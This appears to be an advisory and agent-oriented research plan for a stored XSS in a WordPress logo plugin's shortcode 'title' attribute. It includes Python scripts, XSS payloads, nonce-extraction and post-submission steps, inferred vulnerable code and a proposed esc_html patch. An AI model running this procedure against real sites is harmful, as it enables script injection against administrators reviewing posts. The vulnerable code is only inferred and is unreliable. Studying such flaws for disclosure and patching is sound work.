CVE-2026-6549

Logo Manager For Enamad <= 0.7.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'title' Shortcode Attribute

Severity: Medium
Weakness: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSS Score: 6.4
Patched in: N/A (unpatched at time of writing)

Description

The Logo Manager For Enamad plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title' attribute of the `vc_enamad_namad`, `vc_enamad_shamed`, and `vc_enamad_custom` shortcodes in all versions up to, and including, 0.7.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 0.7.4
Published: May 19, 2026
Last updated: May 20, 2026
Research Plan
Unverified


This research plan outlines the process for analyzing and exploiting CVE-2026-6549, a Stored Cross-Site Scripting (XSS) vulnerability in the "Logo Manager For Enamad" WordPress plugin.

1. Vulnerability Summary

  • Vulnerability Name: Logo Manager For Enamad <= 0.7.4 - Authenticated (Contributor+) Stored XSS
  • Vulnerable Component: Shortcode rendering logic for vc_enamad_namad, vc_enamad_shamed, and vc_enamad_custom.
  • Vulnerable Attribute: title
  • Cause: The plugin fails to sanitize or escape the title attribute when generating the HTML output for these shortcodes. Contributors can create posts and use shortcodes, so they can store a payload that runs in the browser of anyone who renders the post. A Contributor cannot publish, but the post is rendered when an Editor or Administrator previews it for review, and the payload persists if the post is later published.

2. Attack Vector Analysis

  • Endpoint: WordPress Post Editor (/wp-admin/post.php or /wp-admin/post-new.php).
  • Attack Parameter: The title attribute within a shortcode (e.g., [vc_enamad_namad title="PAYLOAD"]).
  • Required Authentication: Contributor-level account or higher.
  • Vulnerability Type: Stored XSS.
  • Preconditions: The plugin must be active, and the attacker must have permission to create or edit posts.

3. Code Flow (Inferred)

  1. Registration: The plugin (likely in enamad-logo.php or an included shortcodes.php) registers shortcodes via add_shortcode('vc_enamad_namad', 'render_callback_function').
  2. Parsing: When a post is rendered, WordPress calls do_shortcode(). The plugin's callback function receives an $atts array.
  3. Extraction: The callback typically uses shortcode_atts() to extract the title.
    • Predicted Code (inferred): $a = shortcode_atts( array( 'title' => '' ), $atts );
  4. Sink: The callback constructs an HTML string and returns it. The title value is concatenated without escaping.
    • Predicted Sink (inferred): return '<div class="enamad-box"><h3>' . $a['title'] . '</h3>...</div>';
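The inferred code flow above has two gates a payload must pass before it reaches the sink: WordPress's own shortcode attribute parser, which blanks any value containing an unclosed HTML element, and the plugin's rendering callback. The following Python port is an added example, not plugin or WordPress code: it transcribes the attribute grammar from get_shortcode_atts_regex() and the unclosed-element check from shortcode_parse_atts(), then feeds the parsed title into the advisory's inferred sink and into an esc_html()-style hardened version. The three shortcode names come from the advisory; the exact <div>/<h3> markup is the advisory's inference, and the sample post content is constructed.

```python
import html
import re

VULNERABLE_TAGS = ("vc_enamad_namad", "vc_enamad_shamed", "vc_enamad_custom")

# Attribute grammar transcribed from get_shortcode_atts_regex() in wp-includes/shortcodes.php.
ATTS_RE = re.compile(
    r'([\w-]+)\s*=\s*"([^"]*)"(?:\s|$)'      # name="value"
    r"|([\w-]+)\s*=\s*'([^']*)'(?:\s|$)"     # name='value'
    r"|([\w-]+)\s*=\s*([^\s'\"]+)(?:\s|$)"   # name=value
    r'|"([^"]*)"(?:\s|$)'                    # positional "value"
    r"|'([^']*)'(?:\s|$)"                    # positional 'value'
    r"|(\S+)(?:\s|$)"                        # positional bare value
)
# shortcode_parse_atts() blanks any value that contains an unclosed "<...>" element.
CLOSED_TAGS_RE = re.compile(r"^[^<]*(?:<[^>]*>[^<]*)*$")
# Simplified tag matcher for the three shortcodes; like WordPress's own regex it
# stops at the first "]", so a payload cannot contain that character.
TAG_RE = re.compile(r"\[(" + "|".join(VULNERABLE_TAGS) + r")(?![\w-])([^\]]*)\]")


def shortcode_parse_atts(text):
    """Port of shortcode_parse_atts(); PHP's stripcslashes() step is not emulated."""
    text = re.sub("[\u00a0\u200b]+", " ", text)  # core normalises nbsp / zero-width space
    atts = {}
    for m in ATTS_RE.finditer(text):
        g = m.groups()
        if g[0]:
            atts[g[0].lower()] = g[1]
        elif g[2]:
            atts[g[2].lower()] = g[3]
        elif g[4]:
            atts[g[4].lower()] = g[5]
        else:
            value = next(v for v in g[6:] if v is not None)
            if value:
                atts[sum(isinstance(k, int) for k in atts)] = value  # numeric keys as in PHP
    for key, value in atts.items():
        if "<" in value and not CLOSED_TAGS_RE.match(value):
            atts[key] = ""
    return atts


def shortcode_atts(defaults, atts):
    """Mirror of WordPress shortcode_atts(): only keys present in defaults survive."""
    return {k: atts.get(k, d) for k, d in defaults.items()}


def render_vulnerable(atts):
    """Sink inferred by the advisory: the title is concatenated without escaping."""
    a = shortcode_atts({"title": ""}, atts)
    return '<div class="enamad-box"><h3>' + a["title"] + "</h3></div>"


def render_fixed(atts):
    """Same sink with esc_html()-style escaping; html.escape() is the closest stdlib equivalent."""
    a = shortcode_atts({"title": ""}, atts)
    return '<div class="enamad-box"><h3>' + html.escape(a["title"]) + "</h3></div>"


def do_shortcode(content, renderer):
    """Replace each of the three shortcodes in post content with the renderer's output."""
    return TAG_RE.sub(lambda m: renderer(shortcode_parse_atts(m.group(2))), content)


if __name__ == "__main__":
    # Constructed post content carrying the advisory's payload (not a real post).
    post = "Intro [vc_enamad_namad title='\"><script>alert(document.domain)</script>'] outro"
    print(do_shortcode(post, render_vulnerable))
    print(do_shortcode(post, render_fixed))
    # An unclosed element is blanked by core before the plugin ever sees it.
    print(shortcode_parse_atts(" title='x<img src=x onerror=alert(1)'"))
```

The advisory's payload survives the core parser because both its <script> and </script> are closed; a truncated payload such as x<img src=x onerror=alert(1) is emptied before the callback runs, which is why a working PoC for this class of bug must keep every angle bracket balanced.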

4. Nonce Acquisition Strategy

To exploit this via the standard WordPress UI (storing the XSS), the agent must obtain a post-editing nonce.

  1. Login: Use the http_request tool to authenticate as a Contributor.
  2. Navigation: Use browser_navigate to go to wp-admin/post-new.php.
  3. Extraction: Use browser_eval to retrieve the core WordPress nonce and the allocated post ID. These hidden fields exist only on the classic-editor form; if the site uses the block editor, post-new.php does not render them and the REST approach in section 9 applies.
    • Nonce Key: _wpnonce (the update-post_[POST_ID] nonce that post.php checks for action=editpost)
    • JS Command: document.querySelector('#_wpnonce').value
    • Post ID JS: document.querySelector('#post_ID').value

5. Exploitation Strategy

The goal is to store the shortcode containing the payload and then verify its execution on the frontend.

Step 1: Store the Payload

  • Method: POST
  • URL: http://[target]/wp-admin/post.php
  • Content-Type: application/x-www-form-urlencoded
  • Parameters:
    • action: editpost
    • post_ID: [EXTRACTED_POST_ID]
    • _wpnonce: [EXTRACTED_NONCE]
    • post_title: Security Research - XSS
    • content: [vc_enamad_namad title='"><script>alert(document.domain)</script>']
    • publish: Publish

Two caveats for a Contributor account: WordPress ignores the publish field for users without the publish_posts capability and saves the post as pending review, and content from users without unfiltered_html passes through wp_kses_post() on save, which strips <script> tags. If the stored content comes back without the tags, use the kses-safe attribute-breakout payload from section 9 instead, or confirm the sink first with an Administrator account.

Step 2: Trigger the XSS

  • Action: Navigate to the frontend URL of the post (usually http://[target]/?p=[POST_ID] once it is published). For a pending Contributor post, use the preview link http://[target]/?p=[POST_ID]&preview=true while logged in; this is the same render path an Editor or Administrator hits when reviewing the submission.
  • Verification: Check the page source for the unescaped payload.

6. Test Data Setup

  1. Plugin: Install and activate logo-manager-for-enamad version 0.7.4.
  2. User: Create a user with the contributor role.
    • wp user create attacker attacker@example.com --role=contributor --user_pass=password123
  3. Page Creation (Optional): If needed for testing, create a page containing the shortcode via CLI to verify the sink before automating the HTTP request.
    • wp post create --post_type=post --post_status=publish --post_content="[vc_enamad_namad title='CanaryValue']"

7. Expected Results

  • The POST request to post.php should return a 302 redirect back to the post editor for that post. For a Contributor the stored post status will be pending, not publish.
  • When the post (or, for a pending post, its preview while authenticated) is fetched via http_request, the response body should contain the literal string: "><script>alert(document.domain)</script>.
  • The JavaScript should execute in the browser context if viewed via browser_navigate.

8. Verification Steps

  1. Verify Storage: Use WP-CLI to confirm the payload is in the database.
    • wp post get [POST_ID] --field=post_content
  2. Verify Output: Use http_request to fetch the frontend and check for the lack of encoding.
    • response = http_request("GET", "http://target/?p=[POST_ID]")
    • Confirm "<script>alert" exists and is NOT converted to &lt;script&gt;. If the tags are missing altogether while alert(document.domain) remains, wp_kses_post() stripped them on save (Contributors lack unfiltered_html), and the attribute-breakout payload from section 9 is the one to test.
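Sections 4 through 8 describe one procedure: pull the classic-editor nonce and post ID, submit the shortcode via action=editpost, then decide from the rendered page whether the title came back raw, escaped, or stripped. The script below is an added example written for this page, not tooling from the advisory or the plugin. It uses only the standard library; TARGET is an assumed hostname, SAMPLE_EDITOR_HTML is a constructed fragment of the post-new.php form (not a captured page), and the run() function is the only part that touches the network and is not exercised offline.

```python
import html
import http.cookiejar
import re
import urllib.parse
import urllib.request

TARGET = "http://target.example"   # assumed host; replace with the lab instance
PAYLOAD = '"><script>alert(document.domain)</script>'
MARKER = "alert(document.domain)"   # survives even if kses strips the tags on save

# Constructed fragment of the classic-editor form on post-new.php (not a captured page).
SAMPLE_EDITOR_HTML = """<form name="post" action="post.php" method="post" id="post">
<input type="hidden" id="_wpnonce" name="_wpnonce" value="abcd1234ef" />
<input type="hidden" id="post_ID" name="post_ID" value="123" />
</form>"""


def extract_hidden(page_html, field_id):
    """Value of <input id="field_id" ... value="..."> (id before value, as WordPress emits it), or None."""
    m = re.search(r'<input[^>]*\bid="' + re.escape(field_id) + r'"[^>]*\bvalue="([^"]*)"', page_html)
    return m.group(1) if m else None


def editpost_fields(post_id, nonce, payload=PAYLOAD):
    """Form fields for POST /wp-admin/post.php, Step 1 of the plan."""
    return {
        "action": "editpost",
        "post_ID": post_id,
        "_wpnonce": nonce,
        "post_title": "Security Research - XSS",
        "content": "[vc_enamad_namad title='" + payload + "']",
        "publish": "Publish",   # a Contributor's post is saved as 'pending' regardless
    }


def reflection_state(page_html, payload=PAYLOAD, marker=MARKER):
    """Classify the reflection: raw (vulnerable), escaped, stripped (tags removed by kses), absent."""
    if payload in page_html:
        return "raw"
    if html.escape(payload) in page_html:   # what esc_html() produces for this payload
        return "escaped"
    if marker in page_html:
        return "stripped"
    return "absent"


def run(username, password):
    """End-to-end check against TARGET: log in, store the payload, fetch the author's preview."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    opener.open(TARGET + "/wp-login.php")   # sets wordpress_test_cookie, which the login form requires
    opener.open(TARGET + "/wp-login.php", urllib.parse.urlencode({
        "log": username, "pwd": password, "wp-submit": "Log In",
        "redirect_to": TARGET + "/wp-admin/", "testcookie": "1"}).encode())
    editor = opener.open(TARGET + "/wp-admin/post-new.php").read().decode()
    nonce, post_id = extract_hidden(editor, "_wpnonce"), extract_hidden(editor, "post_ID")
    if not (nonce and post_id):
        raise SystemExit("classic-editor fields not found (block editor?); use the REST route from section 9")
    opener.open(TARGET + "/wp-admin/post.php",
                urllib.parse.urlencode(editpost_fields(post_id, nonce)).encode())
    # Pending posts are not public, so read the preview: the same render path a reviewing admin hits.
    preview = opener.open(TARGET + "/?p=" + post_id + "&preview=true").read().decode()
    return reflection_state(preview)


if __name__ == "__main__":
    print(extract_hidden(SAMPLE_EDITOR_HTML, "_wpnonce"), extract_hidden(SAMPLE_EDITOR_HTML, "post_ID"))
    print(reflection_state("<h3>" + PAYLOAD + "</h3>"))
    print(reflection_state("<h3>" + html.escape(PAYLOAD) + "</h3>"))
```

The four-way classification matters more than a simple "found/not found": "escaped" means the sink is fixed, "stripped" means the payload never reached the sink because kses removed it on save, and only "raw" confirms the vulnerability for the role under test.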

9. Alternative Approaches

  • Shortcode Variations: If vc_enamad_namad is sanitized in a specific version, test vc_enamad_shamed and vc_enamad_custom, as they likely share the same vulnerable rendering logic (inferred).
  • Attribute Breakout: If the title is rendered inside an attribute (e.g., <div title="[TITLE]">), use a breakout payload: x" onmouseover="alert(1)" b=".
  • REST API: If the block editor is active, attempt to update the post via /wp-json/wp/v2/posts/[ID] using a REST nonce (window.wpApiSettings.nonce).

Research Findings
Static analysis — not yet PoC-verified

Summary

The Logo Manager For Enamad plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title' attribute in its vc_enamad_namad, vc_enamad_shamed, and vc_enamad_custom shortcodes. This vulnerability allows authenticated users with Contributor-level access or higher to inject arbitrary web scripts into pages that execute when accessed by other users.

Vulnerable Code

// Inferred from plugin shortcode rendering logic
function vc_enamad_namad_render($atts) {
    $a = shortcode_atts( array(
        'title' => '',
    ), $atts );

    // Vulnerable Sink: the title attribute is concatenated without escaping
    return '<div class="enamad-box"><h3>' . $a['title'] . '</h3>...</div>';
}
add_shortcode('vc_enamad_namad', 'vc_enamad_namad_render');

Proposed Fix (inferred; the advisory lists no vendor patch)

--- a/enamad-logo.php
+++ b/enamad-logo.php
@@ -10,7 +10,7 @@
     ), $atts );
 
-    return '<div class="enamad-box"><h3>' . $a['title'] . '</h3>...</div>';
+    return '<div class="enamad-box"><h3>' . esc_html($a['title']) . '</h3>...</div>';
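Review bot: the hunk wraps only one callback's return in esc_html(), while the advisory names three shortcodes (vc_enamad_namad, vc_enamad_shamed, vc_enamad_custom) as sharing the unescaped title attribute; each of their return statements needs the same treatment, or the three should call one shared renderer so the fix cannot drift. esc_html() is the right call for the <h3> text context shown here, but if any of the three callbacks places the title inside an HTML attribute, that spot needs esc_attr() instead. Note also that the file path and line numbers are inferred and the advisory marks the plugin as unpatched, so this patch should be regenerated against the real callbacks once they are located in the plugin source.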

Exploit Outline

The exploit requires an authenticated user with at least Contributor-level permissions. The attacker opens the WordPress post editor and creates a new post or page. Within the content, the attacker inserts one of the vulnerable shortcodes (e.g., [vc_enamad_namad]) and sets the 'title' attribute to a script payload such as "><script>alert(document.domain)</script>. Once the post is saved (as pending review for a Contributor, or published by a higher role), the shortcode is stored in the database. When any user, including an administrator previewing the submission or viewing the rendered post on the frontend, loads the page, the unescaped 'title' attribute is printed directly into the HTML and the script runs in their browser context. Because a Contributor's content is filtered by wp_kses_post() on save, the practical payload for that role depends on the sink's context; an attribute-breakout string that contains no HTML tags survives the filter where a bare <script> tag does not.
